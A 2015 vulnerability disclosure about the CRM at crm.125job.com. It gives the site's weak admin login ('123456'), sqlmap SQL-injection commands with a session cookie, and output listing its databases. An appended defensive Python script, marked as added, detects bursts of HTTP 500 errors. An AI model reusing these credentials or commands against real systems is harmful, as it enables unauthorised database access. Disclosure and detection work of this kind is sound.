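2015-08-21: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-10-05: The vendor has actively ignored the vulnerability; details disclosed to the public.
http://crm.125job.com/login
Account: admin
Password: 123456
Clicking "edit user" leads directly into that user's personal center.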
sqlmap -u "http://crm.125job.com/smanager/list?user=a&name=&departmentid=&yt0=%E6%90%9C%E7%B4%A2" --dbs --cookie SiteAccess=a3bf4f7355086552a8ee259294184085
sqlmap -u "http://crm.125job.com/smanager/list?user=a&name=&departmentid=&yt0=%E6%90%9C%E7%B4%A2" --tables crm --cookie SiteAccess=a3bf4f7355086552a8ee259294184085
Database: information_schema
[28 tables]
Database: crm
[135 tables]
[22:02:33] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 327 times
[22:02:33] [INFO] fetched data logged to text files under 'C:\Users\ADMINI~1\Desktop\SqlMap\SQLMAP~1\Bin\output\crm.125job.com'
[*] shutting down at 22:02:33
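Change the weak password; filter special characters.
Unable to contact the vendor, or the vendor actively refused.
Vulnerability Rank: 15 (WooYun rating)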
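
The sqlmap output above reports 327 HTTP 500 responses during testing, which is a signal a defender can alert on. The following is an added example, not part of the original report: it flags any client that triggers a burst of 5xx responses on a single path. The combined log format, the IP addresses, the threshold and the window are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed combined-log-format layout: ip, timestamp, request line, status, size.
LINE_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

def constructed_sample():
    """Constructed log lines: one noisy client and one ordinary client."""
    lines = []
    for i in range(30):  # 30 server errors in 30 seconds from a single client
        lines.append(f'203.0.113.9 - - [21/Aug/2015:22:01:{i:02d} +0800] '
                     f'"GET /smanager/list?user=probe{i} HTTP/1.1" 500 312')
    for i in range(5):   # ordinary traffic, successful responses
        lines.append(f'198.51.100.7 - - [21/Aug/2015:22:01:{i * 10:02d} +0800] '
                     '"GET /smanager/list?user=a HTTP/1.1" 200 5120')
    # A single isolated 500 must not raise an alert.
    lines.append('198.51.100.7 - - [21/Aug/2015:22:01:55 +0800] '
                 '"GET /smanager/list?user=a HTTP/1.1" 500 312')
    return lines

def find_error_bursts(lines, threshold=20, window=timedelta(seconds=60)):
    """Return (ip, path, total_5xx) for clients with >= threshold 5xx in one window."""
    events = defaultdict(list)  # (ip, path) -> timestamps of 5xx responses
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not parse instead of failing
        ip, ts, _method, url, status = m.groups()
        if status.startswith("5"):
            path = url.split("?", 1)[0]  # group by path, ignoring the query string
            events[(ip, path)].append(datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"))
    alerts = []
    for (ip, path), stamps in events.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):  # sliding window over sorted timestamps
            while stamps[end] - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append((ip, path, len(stamps)))
                break
    return alerts

if __name__ == "__main__":
    for ip, path, count in find_error_bursts(constructed_sample()):
        print(f"ALERT {ip} caused {count} 5xx responses on {path}")
```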